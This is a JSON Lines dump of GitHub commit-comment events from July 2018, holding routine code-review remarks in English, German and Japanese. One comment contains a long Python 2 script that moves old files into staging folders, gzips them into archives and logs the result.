{"id":"7943293906","type":"CommitCommentEvent","actor":{"login":"dakhnod"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29655247,"position":22,"line":87,"path":"app/src/main/java/d/d/meshenger/ContactSqlHelper.java","commit_id":"4cb79456e0706e7afebf6d60a3836ec156a3c62f","created_at":"2018-07-10T11:55:20Z","updated_at":"2018-07-10T11:55:20Z","author_association":"OWNER","body":"Bei einem Insert-call escaped Android die automatisch, da muss nix\nunescaped werden.\n\nDer einzige Fall, wo die escaped werden müssen, ist bei der Where-clause an\neinigen stellen, und da wird ja nix inserted.\n\nMoritz Warning <notifications@github.com> schrieb am Di., 10. Juli 2018,\n13:44:\n\n> Müssen die Zeichenketten bei der Rückgabe wieder unescaped werden oder so?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dakhnod/Meshenger/commit/4cb79456e0706e7afebf6d60a3836ec156a3c62f#commitcomment-29655126>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AY7qF-G-CK9LHOjDw2E1dmYtySGcJ3x1ks5uFJOIgaJpZM4VJQEC>\n> .\n>\n"}},"created_at":"2018-07-10T11:55:20Z"}
{"id":"7943294889","type":"CommitCommentEvent","actor":{"login":"eco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655250,"position":21,"line":54,"path":"addons/web/static/src/js/views/basic/basic_controller.js","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-10T11:55:32Z","updated_at":"2018-07-10T11:55:32Z","author_association":"NONE","body":"I just tried that but one problem is _update is called at the very end, after the element has been rendered:\r\nhttps://github.com/odoo/odoo/blob/master/addons/web/static/src/js/views/abstract_controller.js#L93"}},"created_at":"2018-07-10T11:55:32Z"}
{"id":"7943303477","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655261,"position":5,"line":4,"path":"odoo/addons/test_read_group/tests/test_empty.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T11:57:20Z","updated_at":"2018-07-10T11:57:20Z","author_association":"MEMBER","body":"Please avoid having \"spacing changes\" (add/remove spaces/blank lines) mixed with actual code in your diff.\r\nThis makes it more difficult to read."}},"created_at":"2018-07-10T11:57:20Z"}
{"id":"7943306825","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29655270,"position":55,"line":23,"path":"3-23b/3-23b.cpp","commit_id":"5ce8d6303a0fccb491d0103a32267ef7172a5958","created_at":"2018-07-10T11:58:03Z","updated_at":"2018-07-10T11:58:03Z","author_association":"COLLABORATOR","body":"3-22aで指摘したことと同じです。"}},"created_at":"2018-07-10T11:58:03Z"}
{"id":"7943309727","type":"CommitCommentEvent","actor":{"login":"jellysnake"},"repo":{"name":"MovingBlocks/Terasology"},"payload":{"comment":{"id":29655277,"position":16,"line":27,"path":"engine/src/main/java/org/terasology/world/block/items/OnBlockItemPlaced.java","commit_id":"209bb8d2d8c89391ba670ac4922d1b75b839342a","created_at":"2018-07-10T11:58:38Z","updated_at":"2018-07-10T11:58:38Z","author_association":"CONTRIBUTOR","body":"It appears you've accidentally removed this line. That's what's breaking the build."}},"created_at":"2018-07-10T11:58:38Z"}
{"id":"7943315442","type":"CommitCommentEvent","actor":{"login":"AdotDal"},"repo":{"name":"AdotDal/Gallant"},"payload":{"comment":{"id":29655283,"position":null,"line":null,"path":null,"commit_id":"47aef5b3ac729eb75247824ae623aa7be905314f","created_at":"2018-07-10T11:59:51Z","updated_at":"2018-07-10T11:59:51Z","author_association":"OWNER","body":"import os\r\nimport sys\r\nimport time\r\nimport shutil\r\nimport tarfile\r\nfrom os.path import isfile, isdir, join\r\nfrom datetime import datetime\r\nimport logging\r\n\r\n# Global variable for logging\r\nglobal cnt\r\nglobal total_size\r\nglobal log_file_list\r\nis_new = True\r\n\r\n#\r\n# Implementation\r\n#\r\ndef check_date(file_name, flag):\r\n    \"\"\" Function to check that a file is old \"\"\"\r\n\r\n    # Get current date\r\n    now_date = datetime.now().date()\r\n\r\n    n_year = now_date.year\r\n    n_month = now_date.month\r\n    n_day = now_date.day\r\n\r\n    # Get Staging directory name\r\n    if flag == 1:\r\n        # Get timestamp from file name\r\n        modified_timestamp = os.path.getmtime(file_name)\r\n        f_year = datetime.utcfromtimestamp(modified_timestamp).year\r\n        f_month = datetime.utcfromtimestamp(modified_timestamp).month\r\n        f_date =  datetime.utcfromtimestamp(modified_timestamp).day    \r\n\r\n        if (f_year > n_year) or ((f_month >= n_month) and (f_year == n_year)):\r\n            return False\r\n\r\n        if f_month < 12:\r\n            if f_month < 9:\r\n                f_month = '0' + str(f_month + 1)\r\n            else:\r\n                f_month = str(f_month + 1)\r\n\r\n            staging_subdir = '%s%d%s%s' % ('data_prior_to_', f_year, f_month, '01')\r\n        else:\r\n            staging_subdir = '%s%d%s' % ('data_prior_to_', f_year + 1, '0101')\r\n\r\n        return staging_subdir\r\n\r\n    if flag == 2:\r\n        # Get timestamp from file name\r\n        datetime_str_arr = str(file_name).split(\"_\")\r\n        datetime_str = str(datetime_str_arr.pop().split(\".\")[0])\r\n\r\n        f_year = int(datetime_str[0:4])     # year\r\n        f_month = int(datetime_str[4:6])    # month\r\n        f_date = int(datetime_str[6:8])     # date\r\n\r\n        if (f_year < n_year - 1) or (f_year == n_year and f_month < n_month - 6):\r\n            return True;\r\n        elif f_year + 1 == n_year and (f_month <= 6 or (f_month > 6 and (f_month + 6) % 12 <= n_month)):\r\n            return True;\r\n        else:\r\n            return False;\r\n\r\n\r\ndef validate_file(file_name):\r\n    \"\"\" Function to validate file format \"\"\"\r\n\r\n    dir_array = str(file_name).split(\"_\")\r\n\r\n    # Check about directories of Staging directory\r\n    if dir_array.__len__() == 4:\r\n        if dir_array[3].isdigit():\r\n            if len(dir_array[3]) == 8:\r\n                return True\r\n    return False \r\n\r\ndef move_staging(path, staging_path):\r\n    \"\"\" Function to move old files to Staging directory \"\"\"\r\n\r\n    print \"\\nMoving old files from \" + str(path) + \" directory to Staging directory...\"\r\n\r\n    global cnt\r\n    global total_size\r\n    global log_file_list \r\n\r\n    f1 = 0\r\n    f2 = 0\r\n    f3 = 0\r\n    f4 = 0   \r\n    f5 = 0\r\n    f6 = 0\r\n    f7 = 0\r\n    f8 = 0\r\n\r\n    print \"===== \" + str(path) + \" ======\"\r\n    sub_dir1 = os.listdir(path)\r\n\r\n    for sub1 in sub_dir1:\r\n        if os.path.isdir(join(path,sub1)):\r\n            f1 += 1\r\n    if f1 == 0:\r\n        for sub1 in sub_dir1:\r\n            if os.path.isfile(join(path,sub1)):\r\n                staging_datadir = check_date(join(path, sub1), 1)   \r\n                if staging_datadir == False:\r\n                    staging_datadir = \"\"\r\n                else:\r\n                    try:\r\n                        os.stat(join(staging_path, staging_datadir))\r\n                    except:\r\n                        os.mkdir(join(staging_path, staging_datadir))\r\n                    try:\r\n                        os.stat(join(staging_path, staging_datadir, path))\r\n                    except:\r\n                        os.mkdir(join(staging_path, staging_datadir, path))                 \r\n    \r\n                    cnt += 1\r\n                    total_size += os.path.getsize(join(path, sub1))\r\n                    log_file_list.append(join(path, sub1))                \r\n        shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))           \r\n    else:\r\n        for sub1 in sub_dir1:\r\n            if os.path.isdir(join(path, sub1)):     \r\n                sub_dir2 = os.listdir(join(path, sub1))\r\n                for sub2 in sub_dir2:\r\n                    if os.path.isdir(join(path, sub1, sub2)):                \r\n                        f2 += 1\r\n        if f2 == 0:\r\n            for sub1 in sub_dir1:\r\n                if os.path.isdir(join(path, sub1)):    \r\n                    sub_dir2 = os.listdir(join(path, sub1))\r\n                    for sub2 in sub_dir2:\r\n                        if os.path.isfile(join(path, sub1, sub2)):\r\n                            staging_datadir = check_date(join(path, sub1, sub2), 1)   \r\n                            if staging_datadir == False:\r\n                                staging_datadir = \"\"\r\n                            else:\r\n                                try:\r\n                                    os.stat(join(staging_path, staging_datadir))\r\n                                except:\r\n                                    os.mkdir(join(staging_path, staging_datadir))                        \r\n                                try:\r\n                                    os.stat(join(staging_path, staging_datadir, path))\r\n                                except:\r\n                                    os.mkdir(join(staging_path, staging_datadir, path))                                 \r\n                                cnt += 1\r\n                                total_size += os.path.getsize(join(path, sub1, sub2))\r\n                                log_file_list.append(join(path, sub1, sub2))                             \r\n                    shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))                        \r\n        else:\r\n            for sub1 in sub_dir1:\r\n                if os.path.isdir(join(path, sub1)):     \r\n                    sub_dir2 = os.listdir(join(path, sub1))\r\n                    for sub2 in sub_dir2:\r\n                        if os.path.isdir(join(path, sub1, sub2)): \r\n                            sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                            for sub3 in sub_dir3:\r\n                                if os.path.isdir(join(path, sub1, sub2, sub3)):                                              \r\n                                    f3 += 1           \r\n\r\n            if f3 == 0:\r\n                for sub2 in sub_dir2:\r\n                    if os.path.isdir(join(path, sub1, sub2)):            \r\n                        sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                        for sub3 in sub_dir3:\r\n                            if os.path.isfile(join(path, sub1, sub2, sub3)):\r\n                                staging_datadir = check_date(join(path, sub1, sub2, sub3), 1)   \r\n                                if staging_datadir == False:\r\n                                    staging_datadir = \"\"\r\n                                else:\r\n                                    try:\r\n                                        os.stat(join(staging_path, staging_datadir))\r\n                                    except:\r\n                                        os.mkdir(join(staging_path, staging_datadir))                                    \r\n                                    try:\r\n                                        os.stat(join(staging_path, staging_datadir, path))\r\n                                    except:\r\n                                        os.mkdir(join(staging_path, staging_datadir, path))                             \r\n                                    cnt += 1  \r\n                                    total_size += os.path.getsize(join(path, sub1, sub2, sub3))\r\n                                    log_file_list.append(join(path, sub1, sub2, sub3))                                         \r\n                        shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))            \r\n            else:\r\n                for sub1 in sub_dir1:\r\n                    if os.path.isdir(join(path, sub1)):     \r\n                        sub_dir2 = os.listdir(join(path, sub1))\r\n                        for sub2 in sub_dir2:\r\n                            if os.path.isdir(join(path, sub1, sub2)): \r\n                                sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                for sub3 in sub_dir3:\r\n                                    if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                        sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                        for sub4 in sub_dir4:\r\n                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):                                                  \r\n                                                f4 += 1\r\n                if f4 == 0:\r\n                    for sub3 in sub_dir3:\r\n                        if os.path.isdir(join(path, sub1, sub2, sub3)):                    \r\n                            sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                            for sub4 in sub_dir4:\r\n                                if os.path.isfile(join(path, sub1, sub2, sub3, sub4)):\r\n                                    staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4), 1)   \r\n                                    if staging_datadir == False:\r\n                                        staging_datadir = \"\"\r\n                                    else:\r\n                                        try:\r\n                                            os.stat(join(staging_path, staging_datadir))\r\n                                        except:\r\n                                            os.mkdir(join(staging_path, staging_datadir))                                                \r\n                                        try:\r\n                                            os.stat(join(staging_path, staging_datadir, path))\r\n                                        except:\r\n                                            os.mkdir(join(staging_path, staging_datadir, path))                             \r\n                                        cnt += 1  \r\n                                        total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4))\r\n                                        log_file_list.append(join(path, sub1, sub2, sub3, sub4))                                                     \r\n                            shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))                                            \r\n                else:\r\n                    for sub1 in sub_dir1:\r\n                        if os.path.isdir(join(path, sub1)):     \r\n                            sub_dir2 = os.listdir(join(path, sub1))\r\n                            for sub2 in sub_dir2:\r\n                                if os.path.isdir(join(path, sub1, sub2)): \r\n                                    sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                    for sub3 in sub_dir3:\r\n                                        if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                            sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                            for sub4 in sub_dir4:\r\n                                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                    sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                    for sub5 in sub_dir5:\r\n                                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):                                                         \r\n                                                            f5 += 1\r\n                    if f5 == 0:\r\n                        for sub4 in sub_dir4:\r\n                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):                    \r\n                                sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                for sub5 in sub_dir5:\r\n                                    if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5)):\r\n                                        staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5), 1)   \r\n                                        if staging_datadir == False:\r\n                                            staging_datadir = \"\"\r\n                                        else:\r\n                                            try:\r\n                                                os.stat(join(staging_path, staging_datadir))\r\n                                            except:\r\n                                                os.mkdir(join(staging_path, staging_datadir))                                                            \r\n                                            try:\r\n                                                os.stat(join(staging_path, staging_datadir, path))\r\n                                            except:\r\n                                                os.mkdir(join(staging_path, staging_datadir, path))                \r\n                                            cnt += 1     \r\n                                            total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                            log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5))                                                                 \r\n                                shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))                        \r\n                    else:\r\n                        for sub1 in sub_dir1:\r\n                            if os.path.isdir(join(path, sub1)):     \r\n                                sub_dir2 = os.listdir(join(path, sub1))\r\n                                for sub2 in sub_dir2:\r\n                                    if os.path.isdir(join(path, sub1, sub2)): \r\n                                        sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                        for sub3 in sub_dir3:\r\n                                            if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                                sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                                for sub4 in sub_dir4:\r\n                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                        sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                        for sub5 in sub_dir5:\r\n                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):   \r\n                                                                sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                                                for sub6 in sub_dir6:\r\n                                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):                                                                   \r\n                                                                        f6 += 1\r\n                        if f6 == 0:\r\n                            for sub5 in sub_dir5:\r\n                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):                    \r\n                                    sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                    for sub6 in sub_dir6:\r\n                                        if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):\r\n                                            staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5, sub6), 1)   \r\n                                            if staging_datadir == False:\r\n                                                staging_datadir = \"\"\r\n                                            else:\r\n                                                try:\r\n                                                    os.stat(join(staging_path, staging_datadir))\r\n                                                except:\r\n                                                    os.mkdir(join(staging_path, staging_datadir))                                                                           \r\n                                                try:\r\n                                                    os.stat(join(staging_path, staging_datadir, path))\r\n                                                except:\r\n                                                    os.mkdir(join(staging_path, staging_datadir, path))                \r\n                                                cnt += 1   \r\n                                                total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                                log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5, sub6))                                                                             \r\n                                    shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))   \r\n\r\n                        else:\r\n                            for sub1 in sub_dir1:\r\n                                if os.path.isdir(join(path, sub1)):     \r\n                                    sub_dir2 = os.listdir(join(path, sub1))\r\n                                    for sub2 in sub_dir2:\r\n                                        if os.path.isdir(join(path, sub1, sub2)): \r\n                                            sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                            for sub3 in sub_dir3:\r\n                                                if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                                    sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                                    for sub4 in sub_dir4:\r\n                                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                            sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                            for sub5 in sub_dir5:\r\n                                                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):   \r\n                                                                    sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                                                    for sub6 in sub_dir6:\r\n                                                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):       \r\n                                                                            sub_dir7 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                                                            for sub7 in sub_dir7:\r\n                                                                                if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7)):                                                                                   \r\n                                                                                    f7 += 1\r\n                            if f7 == 0:\r\n                                for sub6 in sub_dir6:\r\n                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):                    \r\n                                        sub_dir7 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                        for sub7 in sub_dir7:\r\n                                            if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7)):\r\n                                                staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7), 1)   \r\n                                                if staging_datadir == False:\r\n                                                    staging_datadir = \"\"\r\n                                                else:\r\n                                                    try:\r\n                                                        os.stat(join(staging_path, staging_datadir))\r\n                                                    except:\r\n                                                        os.mkdir(join(staging_path, staging_datadir))                                                                           \r\n                                                    try:\r\n                                                        os.stat(join(staging_path, staging_datadir, path))\r\n                                                    except:\r\n                                                        os.mkdir(join(staging_path, staging_datadir, path))                \r\n                                                    cnt += 1   \r\n                                                    total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))\r\n                                                    log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))                                                                             \r\n                                        shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))   \r\n                                \r\n                            else:\r\n                                for sub1 in sub_dir1:\r\n                                    if os.path.isdir(join(path, sub1)):     \r\n                                        sub_dir2 = os.listdir(join(path, sub1))\r\n                                        for sub2 in sub_dir2:\r\n                                            if os.path.isdir(join(path, sub1, sub2)): \r\n                                                sub_dir3 = os.listdir(join(path, sub1, sub2))\r\n                                                for sub3 in sub_dir3:\r\n                                                    if os.path.isdir(join(path, sub1, sub2, sub3)):          \r\n                                                        sub_dir4 = os.listdir(join(path, sub1, sub2, sub3))\r\n                                                        for sub4 in sub_dir4:\r\n                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4)):     \r\n                                                                sub_dir5 = os.listdir(join(path, sub1, sub2, sub3, sub4))\r\n                                                                for sub5 in sub_dir5:\r\n                                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5)):   \r\n                                                                        sub_dir6 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5))\r\n                                                                        for sub6 in sub_dir6:\r\n                                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6)):       \r\n                                                                                sub_dir7 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6))\r\n                                                                                for sub7 in sub_dir7:\r\n                                                                                    if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7)):   \r\n                                                                                        sub_dir8 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))\r\n                                                                                        for sub8 in sub_dir8:\r\n                                                                                            if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8)):                                                                                           \r\n                                                                                                f8 += 1\r\n                                if f8 == 0:\r\n                                    for sub7 in sub_dir7:\r\n                                        if os.path.isdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7)):                    \r\n                                            sub_dir7 = os.listdir(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7))\r\n                                            for sub8 in sub_dir8:\r\n                                                if os.path.isfile(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8)):\r\n                                                    staging_datadir = check_date(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8), 1)   \r\n                                                    if staging_datadir == False:\r\n                                                        staging_datadir = \"\"\r\n                                                    else:\r\n                                                        try:\r\n                                                            os.stat(join(staging_path, staging_datadir))\r\n                                                        except:\r\n                                                            os.mkdir(join(staging_path, staging_datadir))                                                                           \r\n                                                        try:\r\n                                                            os.stat(join(staging_path, staging_datadir, path))\r\n                                                        except:\r\n                                                            os.mkdir(join(staging_path, staging_datadir, path))                \r\n                                                        cnt += 1   \r\n                                                        total_size += os.path.getsize(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8))\r\n                                                        log_file_list.append(join(path, sub1, sub2, sub3, sub4, sub5, sub6, sub7, sub8))                                                                             \r\n                                            shutil.move(join(path, sub1), join(staging_path, staging_datadir, path))                                  \r\n\r\ndef get_Archiving(archiving_path):\r\n    total_size = 0\r\n    files = os.listdir(archiving_path)\r\n    if len(files) > 0:\r\n        for i in files:\r\n            total_size += os.path.getsize(join(archiving_path, i))\r\n    print \"Counts : \" + str(len(files))\r\n    print \"Size   : \" + str(total_size)\r\n    return len(files), total_size    \r\n    \r\n\r\ndef prepare_compression(staging_path, archiving_path):\r\n    \"\"\" function to compress as Gzip file and  move into Archiving directory \"\"\"\r\n\r\n    print \"Compressing gzip files and move into Archiving directory...\"\r\n    \r\n    # Get the counts and size of files of Archiving that before compression.\r\n    print \"Current files of Archiving\" \r\n    before_counts, before_size = get_Archiving(archiving_path)\r\n    \r\n    # Get all files of Staging directory\r\n    files = os.listdir(staging_path)\r\n    global cnt\r\n    global total_size\r\n    global log_file_list\r\n    log_file_list = []\r\n    for f in files:\r\n        if isfile(join(staging_path, f)):\r\n            continue\r\n\r\n        if not validate_file(f):\r\n            continue\r\n\r\n        # Remove directory from Staging\r\n        if not check_date(join(staging_path, f), 2):\r\n            continue\r\n\r\n        # Compress as Gzip file and move to Archiving directory\r\n        gzpath = join(archiving_path, f) + '.tar.gz'\r\n        f_out = tarfile.open(gzpath, 'w:gz')\r\n        f_out.add(join(staging_path, f), arcname = f)\r\n        f_out.close()\r\n        total_size += os.path.getsize(gzpath)\r\n        log_file_list.append(f+'.tar.gz')\r\n    \r\n    # Get the counts and size of files of Archiving that after compression.\r\n    print \"Check the compressed state\"\r\n    after_counts, after_size = get_Archiving(archiving_path)    \r\n    if after_counts > before_counts and after_size > before_size:\r\n        shutil.rmtree(join(staging_path, f))\r\n\r\ndef logging_file(flag):\r\n    \"\"\" Function to save logging information \"\"\"\r\n\r\n    global cnt\r\n    global total_size\r\n    global log_file_list    \r\n    global is_new\r\n\r\n    # Logging filename\r\n    log_filename = \"history.log\"\r\n\r\n    # Open log file\r\n    try:\r\n        f = open(log_filename, 'a')\r\n    except IOError:\r\n        os.stat(log_filename)\r\n\r\n    # Write head info\r\n    if is_new == True:\r\n        print >> f, '\\n--------------- ' + str(datetime.now().date()) + ' ' + str(datetime.now().strftime(\"%H:%M:%S\")) + ' ---------------\\n'\r\n        is_new = False\r\n\r\n    if flag == 1:        \r\n        print >> f, str(cnt) + ' files (' + str(total_size/1000000.0) +' MB) are moved from Data to Staging directory: '\r\n\r\n    else:\r\n        print >> f, str(total_size/1000000.0) +' MB and moved from Staging to Archiving directory: '\r\n    print >> f, ''\r\n\r\n    # Write archiving data filename\r\n    print >> f, ''\r\n    for log_file in log_file_list:\r\n        print >> f, '\\t' + str(log_file)\r\n\r\n    print >> f, ''\r\n\r\n    logging.shutdown()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    # Source directory path\r\n    staging_path = \"Staging\"\r\n    archiving_path = \"Archiving\"\r\n\r\n    cnt = 0\r\n    total_size = 0\r\n    log_file_list = []\r\n\r\n    # Get all data directories\r\n    data_path_list = [\"Data\", \"ftp\", \"Mi\"]\r\n    \r\n    for data_path in data_path_list:\r\n        if os.path.exists(data_path):\r\n            # Move files from data to staging directory\r\n            move_staging(data_path, staging_path)\r\n\r\n    # Logging for Staging state\r\n    if cnt > 0:\r\n        logging_file(1)\r\n\r\n    # Compress and move gzip files from staging to archiving\r\n    prepare_compression(staging_path, archiving_path)\r\n\r\n    # Logging for Archiving state\r\n    if cnt > 0:\r\n        logging_file(2)\r\n\r\n    print \"\\nComplete successfully!\"\r\n"}},"created_at":"2018-07-10T11:59:51Z"}
{"id":"7943322931","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29655300,"position":40,"line":28,"path":"3-24/3-24.cpp","commit_id":"b8eb31e3c95f450630a5bc1593f9eca321ce635a","created_at":"2018-07-10T12:01:19Z","updated_at":"2018-07-10T12:01:19Z","author_association":"COLLABORATOR","body":"3-23aで指摘したことと同様です。(石井)"}},"created_at":"2018-07-10T12:01:19Z"}
{"id":"7943325748","type":"CommitCommentEvent","actor":{"login":"PierreRambaud"},"repo":{"name":"mickaelandrieu/PrestaShop"},"payload":{"comment":{"id":29655302,"position":15,"line":77,"path":"tools/build/Library/Version.php","commit_id":"999db695df88cb89b6ecc4c2cb993790c3b764ef","created_at":"2018-07-10T12:01:54Z","updated_at":"2018-07-10T12:01:54Z","author_association":"COLLABORATOR","body":":heart: "}},"created_at":"2018-07-10T12:01:54Z"}
{"id":"7943327797","type":"CommitCommentEvent","actor":{"login":"myurliskai"},"repo":{"name":"myurliskai/sturdy-happiness"},"payload":{"comment":{"id":29655312,"position":3,"line":3,"path":"README.md","commit_id":"265df6ae8ba13b8be6aeeabdd7ae0ccaaf3a3992","created_at":"2018-07-10T12:02:20Z","updated_at":"2018-07-10T12:02:20Z","author_association":"OWNER","body":"an attempt at vague description"}},"created_at":"2018-07-10T12:02:20Z"}
{"id":"7943334851","type":"CommitCommentEvent","actor":{"login":"sandeepsw"},"repo":{"name":"amar-shieldwatch/test"},"payload":{"comment":{"id":29655342,"position":null,"line":null,"path":null,"commit_id":"ed218f7c4db354ae691adba1041090bf45f85d0e","created_at":"2018-07-10T12:03:56Z","updated_at":"2018-07-10T12:03:56Z","author_association":"COLLABORATOR","body":"test"}},"created_at":"2018-07-10T12:03:56Z"}
{"id":"7943339573","type":"CommitCommentEvent","actor":{"login":"divanova-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29655348,"position":28,"line":192,"path":"Gravity/Gravity/Base/BaseDto.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-10T12:04:58Z","updated_at":"2018-07-10T12:04:58Z","author_association":"COLLABORATOR","body":"This code snippet has been updated with suggested approach."}},"created_at":"2018-07-10T12:04:58Z"}
{"id":"7943340113","type":"CommitCommentEvent","actor":{"login":"Tha14"},"repo":{"name":"NicklasVraa/nv-dark-syntax"},"payload":{"comment":{"id":29655350,"position":null,"line":null,"path":null,"commit_id":"e045d924d5289228e96634ff3004db54387064f6","created_at":"2018-07-10T12:05:06Z","updated_at":"2018-07-10T12:05:06Z","author_association":"NONE","body":"Hi, I really like this syntax theme. The highlighting is way better now. I am using a dynamic background on my atom and comments as well as the highlights are not very visible."}},"created_at":"2018-07-10T12:05:06Z"}
{"id":"7943342277","type":"CommitCommentEvent","actor":{"login":"ad-m"},"repo":{"name":"hyperonecom/h1-cli"},"payload":{"comment":{"id":29655354,"position":4,"line":8,"path":"docs/firewall.md","commit_id":"e694d73d038231ea7860e271c18dd08ceb03e7a3","created_at":"2018-07-10T12:05:35Z","updated_at":"2018-07-10T12:05:35Z","author_association":"COLLABORATOR","body":"Duplicated. Somethings was broken during rebasing / merging."}},"created_at":"2018-07-10T12:05:35Z"}
{"id":"7943342999","type":"CommitCommentEvent","actor":{"login":"lacrioque"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29655356,"position":29,"line":145,"path":"themes/survey/vanilla/scripts/ajaxify.js","commit_id":"d40dae716d5d7a58623a8ad334fd17625b8183a7","created_at":"2018-07-10T12:05:44Z","updated_at":"2018-07-10T12:05:44Z","author_association":"CONTRIBUTOR","body":"No it's not, a.e.  the file upload triggered the page submit.\r\nThere were a bunch of errors happing because the selector was too unspecific. It is not possible to clearly check for the submitting butten because it can be anywhere.\r\nAlso this specific selector didn't work ion IE11 and since it is still a major browser and we go for maximum compatibility on the frontend we cannot use any html5 data selectors"}},"created_at":"2018-07-10T12:05:44Z"}
{"id":"7943343488","type":"CommitCommentEvent","actor":{"login":"l0ftyWhizZ"},"repo":{"name":"MovingBlocks/Terasology"},"payload":{"comment":{"id":29655359,"position":16,"line":27,"path":"engine/src/main/java/org/terasology/world/block/items/OnBlockItemPlaced.java","commit_id":"209bb8d2d8c89391ba670ac4922d1b75b839342a","created_at":"2018-07-10T12:05:50Z","updated_at":"2018-07-10T12:05:50Z","author_association":"MEMBER","body":"I thought it was due to the incorrect annotation. (It was @deprecated instead of @Deprecated)\r\n"}},"created_at":"2018-07-10T12:05:50Z"}
